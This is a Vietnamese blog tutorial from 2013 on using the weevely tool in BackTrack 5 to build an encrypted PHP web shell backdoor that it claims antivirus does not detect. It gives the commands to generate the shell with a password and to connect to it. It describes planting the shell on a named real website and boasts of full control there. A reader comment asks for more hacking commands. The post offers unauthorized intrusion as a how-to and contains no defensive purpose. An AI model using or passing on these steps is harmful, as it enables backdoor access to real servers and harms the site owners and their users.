Chủ Nhật, 10 tháng 3, 2013

Tạo Backdoor bằng weevely trong backtrack5

Để tạo 1 backdoor đơn giản nhất đã encrypte ta có thể dùng bộ công cụ weevely trong backtrack 5.Con backdoor tạo ra có thể vượt đc anti,ko bị phát hiện.
đầu tiền mở terminal lên,vào thư mục chứa công cụ
cd /pentest/backdoors/web/weevely 
xem các file có trong này

Tạo một con backdoor bằng cấu trúc lệnh như sau
./weevely.py generate capuchino /root/Desktop/capuchi.php
trong đó /root/Desktop/capuchi.php là tên file và vị trí nó nằm capuchino là password đc set nhé


generate là lệnh tạo ra file,nhờ nó mà sau này ta có thể connect với con backdoor này bằng chính bộ weevely.

ta ví dụ như sau,up con backdoor này lên một server nào đó nhé.Mình lấy 1 ví dụ bằng 1 con shell đc share trên vhb ha.
victim bị upshell lên là topvn.vn
link shell là http://topvn.vn/sanpham/capuchi.php



ta connect vào shell từ backtrack như sau

./weevely.py http://topvn.vn/sanpham/capuchi.php capuchino
trong đó capuchino là password lúc tạo shell nhé.

sau khi connect xong ta nhận đc như sau


Giờ ta thao tác với full quyền nhé,làm gì cũng đc,hihi

kiểm tra bằng lệnh liệt kê file thử xem có đc ko nhé


thành công mĩ mãn nhé.tut by capuchino


1 nhận xét:

  1. Bạn cho mình xin cách lệnh hack cơ bản trong BT5 đi bạn. Connect đc sever ko biết lệnh sao hack :v

    Trả lờiXóa